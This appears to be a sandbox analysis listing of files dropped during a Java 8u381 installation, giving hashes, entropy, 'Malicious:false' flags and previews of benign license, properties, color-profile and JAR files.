                                                                                                                                                                                                                                  Preview:## Apache XML Commons Resolver v1.2..### Apache XML Commons Resolver Notice..```..Apache XML Commons Resolver.Copyright 2006 The Apache Software Foundation...This product includes software developed at.The Apache Software Foundation http://www.apache.org/..Portions of this code are derived from classes placed in the.public domain by Arbortext on 10 Apr 2000. See:.http://www.arbortext.com/customer_support/updates_and_technical_notes/catalogs/docs/README.htm.```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1011
                                                                                                                                                                                                                                  Entropy (8bit):4.588387206517629
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## zlib v1.2.13..### zlib License.<pre>..Copyright (C) 1995-2022 Jean-loup Gailly and Mark Adler..This software is provided 'as-is', without any express or implied.warranty. In no event will the authors be held liable for any damages.arising from the use of this software...Permission is granted to anyone to use this software for any purpose,.including commercial applications, and to alter it and redistribute it.freely, subject to the following restrictions:..1. The origin of this software must not be misrepresented; you must not. claim that you wrote the original software. If you use this software. in a product, an acknowledgment in the product documentation would be. appreciated but is not required..2. Altered source versions must be plainly marked as such, and must not be. misrepresented as being the original software..3. This notice may not be removed or altered from any source distribution...Jean-loup Gailly Mark Adler.jloup@gzip.org madler@alumni.caltech.e
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):149
                                                                                                                                                                                                                                  Entropy (8bit):4.558376029276625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Load the Java Access Bridge class into the JVM.#.#assistive_technologies=com.sun.java.accessibility.AccessBridge.#screen_magnifier_present=true..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1482
                                                                                                                                                                                                                                  Entropy (8bit):5.175972768583767
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QVDBgkjOOVul8DbeQ1N3s5MCmCkcJF+DK+Obv:KqOVu2HX1C5MCmCkcJFvRL
                                                                                                                                                                                                                                  MD5:3F731B169E01A9EFE3E19A1F40679C9A
                                                                                                                                                                                                                                  SHA1:531A6316953FC152809601806FEC55E1BE806700
                                                                                                                                                                                                                                  SHA-256:1169FCBA1385B8E4BACCBD8156A43E3179C26E1877CC154BD16FF23874B208EA
                                                                                                                                                                                                                                  SHA-512:81C03E0B1CF93C873EA495CB6F434FA5FA41F02CFD7DC399E859C565E52E2E942E3ED04D4025F1E4F114DDB180503A5F97FF88FD4C41BB1C810AFB0F03B93EC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.# Japanese imperial calendar.#.# Meiji since 1868-01-01 00:00:00 local time (Gregorian).# Taisho since 1912-07-30 00:00:00 local time (Gregorian).# Showa since 1926-12-25 00:00:00 local time (Gregorian).# Heisei since 1989-01-08 00:00:00 local time (Gregorian).# Reiwa since 2019-05-01 00:00:00 local time (Gregorian).calendar.japanese.type: LocalGregorianCalendar.calendar.japanese.eras: \..name=Meiji,abbr=M,since=-3218832000000; \..name=Taisho,abbr=T,since=-1812153600000; \..name=Showa,abbr=S,since=-1357603200000; \..name=Heisei,abbr=H,since=600220800000; \..name=Reiwa,abbr=R,since=1556668800000..#.# Taiwanese calendar.# Minguo since 1911-01-01 00:00:00 local time (Gregorian).calendar.taiwanese.type: LocalGregorianCalendar.calendar.taiwanese.eras: \..name=MinGuo,since=-1830384000
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3039864
                                                                                                                                                                                                                                  Entropy (8bit):6.6099327607002465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:sAirCz1nEJOOUJbcqt/S7+EXdnvv82lbIeo2S:sAimzNztfa3n3HlbIP
                                                                                                                                                                                                                                  MD5:D4435B45112F95A3C87472C8A46933F6
                                                                                                                                                                                                                                  SHA1:308703B9011FA68CC9D1A30EC74B1FC4895EE65B
                                                                                                                                                                                                                                  SHA-256:B20DDFD8D03D76915E3F43F462007E15C4BFE6A67AFE9A040AE8916696C19D5B
                                                                                                                                                                                                                                  SHA-512:6D9D5C8F68ACB92B1AA3E9F1A0ABE2D42823FC7DFE2C0673BDD2C59ACC638EF053536A567A2BFCE53A26ED6AD4FA39EF73C2F3512EB1DCF8FEE7B12204EC0513
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):84355
                                                                                                                                                                                                                                  Entropy (8bit):4.927199323446014
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                                                                                                                                                                                                                  MD5:7FC71A62D85CCF12996680A4080AA44E
                                                                                                                                                                                                                                  SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                                                                                                                                                                                                                  SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                                                                                                                                                                                                                  SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51236
                                                                                                                                                                                                                                  Entropy (8bit):7.226972359973779
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                                                                                                                                                                                                                  MD5:10F23396E21454E6BDFB0DB2D124DB85
                                                                                                                                                                                                                                  SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                                                                                                                                                                                                                  SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                                                                                                                                                                                                                  SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):632
                                                                                                                                                                                                                                  Entropy (8bit):3.7843698642539243
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                                                                                                                                                                                                                  MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                                                                                                                                                                                                                  SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                                                                                                                                                                                                                  SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                                                                                                                                                                                                                  SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1044
                                                                                                                                                                                                                                  Entropy (8bit):6.510788634170065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                                                                                                                                                                                                                  MD5:A387B65159C9887265BABDEF9CA8DAE5
                                                                                                                                                                                                                                  SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                                                                                                                                                                                                                  SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                                                                                                                                                                                                                  SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):274474
                                                                                                                                                                                                                                  Entropy (8bit):7.843290819622709
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                                                                                                                                                                                                                  MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                                                                                                                                                                                                                  SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                                                                                                                                                                                                                  SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                                                                                                                                                                                                                  SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3144
                                                                                                                                                                                                                                  Entropy (8bit):7.026867070945169
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                                                                                                                                                                                                                  MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                                                                                                                                                                                                                  SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                                                                                                                                                                                                                  SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                                                                                                                                                                                                                  SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5548
                                                                                                                                                                                                                                  Entropy (8bit):5.037985807321917
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:r45Vf4fq7MBzO4pYEZ2MQ6KXr3NO0slzMX+W1CuHvvABbiAQ+xaW/ioLHTU+Wsch:r4KJO4mEZ2MQ6Cr3NO0slzMX+WIuHvvv
                                                                                                                                                                                                                                  MD5:F507712B379FDC5A8D539811FAF51D02
                                                                                                                                                                                                                                  SHA1:82BB25303CF6835AC4B076575F27E8486DAB9511
                                                                                                                                                                                                                                  SHA-256:46F47B3883C7244A819AE1161113FE9D2375F881B75C9B3012D7A6B3497E030A
                                                                                                                                                                                                                                  SHA-512:CB3C99883336D04C42CEA9C2401E81140ECBB7FC5B8EF3301B13268A45C1AC93FD62176AB8270B91528AC8E938C7C90CC9663D8598E224794354546139965DFE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#sun.net.www MIME content-types table.#.# Property fields:.#.# <description> ::= 'description' '=' <descriptive string>.# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>.# <image> ::= 'icon' '=' <filename of icon image>.# <action> ::= 'browser' | 'application' | 'save' | 'unknown'.# <application> ::= 'application' '=' <command line template>.#..#.# The "we don't know anything about this data" type(s)..# Used internally to mark unrecognized types..#.content/unknown: description=Unknown Content.unknown/unknown: description=Unknown Data Type..#.# The template we should use for temporary files when launching an application.# to view a document of given type..#.temp.file.template: c:\\temp\\%s..#.# The "real" types..#.application/octet-stream: \..description=Generic Binary Stream;\..file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz..application/oda: \..description=ODA Document;\..file_extensions=.oda..application/pdf: \..de
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4172
                                                                                                                                                                                                                                  Entropy (8bit):3.2688699228803304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:xlWAFFGFSupi9VBjOtF8CSh8kkC6/wU4XRr/bVdxe+0fBJ:xlWAEi9VBjOtzSh8kk0/pdTkr
                                                                                                                                                                                                                                  MD5:59CFF2DD57555A994A9546A7C5D066C3
                                                                                                                                                                                                                                  SHA1:0BF9BF04670E62C9BEA8A995B4AFE4AF3738FC8F
                                                                                                                                                                                                                                  SHA-256:9174361AA1251F9D6D55263ED0AD44EF4C58CA26B7937808B609B46FEC06950B
                                                                                                                                                                                                                                  SHA-512:358F2ACD2DE4957177EA624C5CE1C5596317F425B03D99B23D0727671C440E1034F52CB390568082DFC756C72C1DD9015DDCF9110C52B7184C05F35F1222929E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5057015
                                                                                                                                                                                                                                  Entropy (8bit):6.569800609749605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:Ugl3o0ESJ+vH8wi7pmb7kfBIp54Ou96HYf9PYjC1:pbYE9gjC1
                                                                                                                                                                                                                                  MD5:C9E2E9AE1D3B960F817ABF4D05BCD677
                                                                                                                                                                                                                                  SHA1:898541B104BDC9697EAD08784A11F28F36F8D904
                                                                                                                                                                                                                                  SHA-256:EE17492548CA255A0BB3378AFD7FE2D1F7EDE58290434D8FF9A18402FA7AB72F
                                                                                                                                                                                                                                  SHA-512:2DF729C55BB12DC8A6904702AF1DB990EB83DBA7793AC0BAE3DD1AB71242D54063F001D151B041F281F7392C365EEB490A6F87EC739899096F2DB8911BFF6D44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........<p.V................META-INF/....PK........;p.VB1.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK........9p.V................com/PK........9p.V................com/oracle/PK........9p.V................com/oracle/deploy/PK........;p.V................com/oracle/deploy/update/PK........9p.V................com/sun/PK........9p.V................com/sun/applet2/PK........9p.V................com/sun/applet2/preloader/PK........9p.V............ ...com/sun/applet2/preloader/event/PK........:p.V................com/sun/deploy/PK........9p.V................com/sun/deploy/appcontext/PK........9p.V................com/sun/deploy/association/PK........;p.V............#...com/sun/deploy/association/utility/PK........9p.V................com/sun/deploy/cache/PK........;p.V................com/sun/deploy/config/PK........:p.V................com/sun/deploy/jardiff/PK........9p.V................com/sun/deplo
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14156
                                                                                                                                                                                                                                  Entropy (8bit):5.7224962963718315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Hl560PT95FQ7nZmKPmpaeWCQ9ezJyg7Uw94w9B0Jpq37S6tsQz/lWQrMl9Ezp57Q:HlrPThIZXWPc
                                                                                                                                                                                                                                  MD5:01F9F38C0BF5D0F7CF945D4C5CB74F4A
                                                                                                                                                                                                                                  SHA1:15D1E0D2486CF4E86B09F3A58058FBCB004B35E8
                                                                                                                                                                                                                                  SHA-256:7B58254BAC60EEAAC1BAC13D805C4438FB309AEC9E2C6228DA844BFD9F266080
                                                                                                                                                                                                                                  SHA-512:368A621EB26C06F490DF70232CB9B2A9425715744F62B7AE67C4107D0BF19DC724F057F4466BCFE0A0D346F0BC1FF25446D1251274AE51734B87CBE4C1C07166
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V............'...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/UT.....d..dux.............PK.........p.V................{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/UT.....d..dux.............PK.........p.V............6...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/UT.....d..dux.............PK.........p.V............>...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/UT.....d..dux.............PK.........p.VmV..........H...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT.....d..dux.............const gJavaConsole1_8_0_381 = {...id.: "javaconsole1.8.0_381",...mimeType: "application/x-java-applet;jpi-version=1.8.0_381",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_381.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_381.enable,false)
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                                                  Entropy (8bit):4.793521742012267
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pSDUEm98mDhDdDDLc59BXnnyzEEUFggBne8TCHCHb2ttfe4ey1nttAUicf9EEZze:pSDi98mFV45bAUS1HCHb2tjHEElfJo
                                                                                                                                                                                                                                  MD5:811BAFA6F97801186910E9B1D9927FE2
                                                                                                                                                                                                                                  SHA1:DC52841C708E3C1EB2A044088A43396D1291BB5E
                                                                                                                                                                                                                                  SHA-256:926CCADAEC649F621590D1AA5E915481016564E7AB28390C8D68BDAAF4785F1F
                                                                                                                                                                                                                                  SHA-512:5AE9C27DCE552EA32603B2C87C1510858F86D9D10CADE691B2E54747C3602FE75DE032CF8917DCD4EE160EE4CC5BE2E708B321BB1D5CDEBFA9FE46C2F870CA7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=internal error, unknown message.error.badinst.nojre=Bad installation. No JRE found in configuration file.error.launch.execv=Error encountered while invoking Java Web Start (execv).error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) .error.listener.failed=Splash: sysCreateListenerSocket failed.error.accept.failed=Splash: accept failed.error.recv.failed=Splash: recv failed.error.invalid.port=Splash: didn't revive a valid port.error.read=Read past end of buffer.error.xmlparsing=XML Parsing error: wrong kind of token found.error.splash.exit=Java Web Start splash screen process exiting .....\n.# "Last WinSock Error" means the error message for the last operation that failed..error.winsock=\tLast WinSock Error: .error.winsock.load=Couldn't load winsock.dll.error.winsock.start=WSAStartup failed.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1345)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3306
                                                                                                                                                                                                                                  Entropy (8bit):4.888605396125911
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MLHMLhMXQXTyf2IXOZza2uuFMir25pAvAv2ITOsdK:OHOh4QD+JJcFZY+ITOqK
                                                                                                                                                                                                                                  MD5:D77C3B5274B8161328AB5C78F66DD0D0
                                                                                                                                                                                                                                  SHA1:D989FE1B8F7904888D5102294EBEFD28D932ECDB
                                                                                                                                                                                                                                  SHA-256:C9399A33BB9C75345130B99D1D7CE886D9148F1936543587848C47B8540DA640
                                                                                                                                                                                                                                  SHA-512:696E28B6BC7E834C51AB9821D0D65D1A32F00EB15CAA732047B751288EA73D8D703D3152BF81F267147F8C1538E1BF470748DF41176392F10E622F4C7708DD92
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=interner Fehler, unbekannte Meldung.error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden.error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten.error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten.error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich.error.accept.failed=Startbildschirm: accept nicht erfolgreich.error.recv.failed=Startbildschirm: recv nicht erfolgreich.error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich.error.read=\u00DCber Pufferende hinaus gelesen.error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden.error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n.# "Last WinSock Error" means the error mess
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1475)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3600
                                                                                                                                                                                                                                  Entropy (8bit):4.74546152535042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1575)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3409
                                                                                                                                                                                                                                  Entropy (8bit):4.800862996269612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1392)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3223
                                                                                                                                                                                                                                  Entropy (8bit):4.671266438569996
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2924)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6349
                                                                                                                                                                                                                                  Entropy (8bit):4.575777726495053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2601)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5712
                                                                                                                                                                                                                                  Entropy (8bit):4.758283080201437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1319)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3285
                                                                                                                                                                                                                                  Entropy (8bit):4.837889715420947
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1379)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3384
                                                                                                                                                                                                                                  Entropy (8bit):4.898189215756456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1857)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4072
                                                                                                                                                                                                                                  Entropy (8bit):5.01527031899567
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Ln7OVgLO4c5tgvDgEY4tnf7OgdbywfK0eSm91js:3OVTjqvIwPtK1js
                                                                                                                                                                                                                                  MD5:E6F84C081895ACDFD98DA0F496E1DD3D
                                                                                                                                                                                                                                  SHA1:1C2B96673DDDD3596890EF4FC22017D484A1F652
                                                                                                                                                                                                                                  SHA-256:A1752A0175F490F61E0AAD46DC6887C19711F078309062D5260E164AC844F61A
                                                                                                                                                                                                                                  SHA-512:D4D28780147E22678CD8E7415CACFAD533AE5AF31D74426BBE4993F05A0707E4F0F71D948093FFA1A0D6EA48310E901CD0ED1C14E2FBDF69C92462D070A9664F
                                                                                                                                                                                                                                  Malicious:false
